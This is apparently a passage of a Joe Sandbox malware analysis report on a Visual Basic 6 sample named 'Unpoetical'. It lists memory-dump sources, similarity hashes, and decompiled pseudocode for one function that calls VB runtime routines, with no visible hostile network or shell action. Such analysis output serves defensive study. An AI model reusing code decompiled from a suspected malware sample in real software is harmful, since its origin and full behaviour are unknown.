      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$Move$#537#593#707Chkstk
      • String ID:
      • API String ID: 2467297632-0
      • Opcode ID: 36addb7eefc240afaa45b40cbfcf4caa36f4530d09d66da41bbceb33eb244605
      • Instruction ID: 8cc933e472cb97826a58900237bc44f9f67801576df98de125e8c73db4138465
      • Opcode Fuzzy Hash: 36addb7eefc240afaa45b40cbfcf4caa36f4530d09d66da41bbceb33eb244605
      • Instruction Fuzzy Hash: D0113071940209ABDB01FBA1CD42BDEBBB4AF00708F10803AF501BB1E1DB7C9645CB99
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041ED8B, Relevance: 12.0, APIs: 8, Instructions: 48COMMON
      Download Yara Rule
      C-Code - Quality: 62%
      			E0041ED8B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				long long _v40;
				char _v48;
				signed char _t22;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t32 = _t31 - 0xc;
				 *[fs:0x0] = _t32;
				L00401540();
				_v16 = _t32;
				_v12 = 0x401358;
				_v8 = 0;
				_t22 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401546, _t29);
				L004017B6();
				asm("fabs");
				asm("fnstsw ax");
				if((_t22 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				L00401666();
				_v40 = __fp0;
				_v48 = 5;
				__eax =  &_v48;
				_push(__eax);
				L0040166C();
				L0040183A();
				L00401828();
				asm("wait");
				_push(0x41ee30);
				L00401846();
				L00401846();
				return __eax;
			}














      0x0041ed8e
      0x0041ed9d
      0x0041eda7
      0x0041edaf
      0x0041edb2
      0x0041edb9
      0x0041edc8
      0x0041edd1
      0x0041eddc
      0x0041edde
      0x0041ede2
      0x0040154c
      0x0040154c
      0x0041ede4
      0x0041ede9
      0x0041edec
      0x0041edf3
      0x0041edf6
      0x0041edf7
      0x0041ee01
      0x0041ee09
      0x0041ee0e
      0x0041ee0f
      0x0041ee22
      0x0041ee2a
      0x0041ee2f

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041EDA7
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EDD1
      • __vbaFPFix.MSVBVM60(?,?,?,?,00401546), ref: 0041EDE4
      • #536.MSVBVM60(00000005), ref: 0041EDF7
      • __vbaStrMove.MSVBVM60(00000005), ref: 0041EE01
      • __vbaFreeVar.MSVBVM60(00000005), ref: 0041EE09
      • __vbaFreeStr.MSVBVM60(0041EE30,00000005), ref: 0041EE22
      • __vbaFreeStr.MSVBVM60(0041EE30,00000005), ref: 0041EE2A
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$#536ChkstkCopyMove
      • String ID:
      • API String ID: 983360083-0
      • Opcode ID: f87bd5f77d42afc0d0eef3baf9fbf64ce131b8538eb196119022c418fa456bf9
      • Instruction ID: e91fe48be24e5b620a0ee1c4fbe60b9b28bdf8c7370217c3a49f1ef048454a74
      • Opcode Fuzzy Hash: f87bd5f77d42afc0d0eef3baf9fbf64ce131b8538eb196119022c418fa456bf9
      • Instruction Fuzzy Hash: F0115E35800209ABCB00FFA6C946BDEBBB4BF05748F10846AF401B71E1DB3C9A45CB59
      Uniqueness

      Uniqueness Score: -1.00%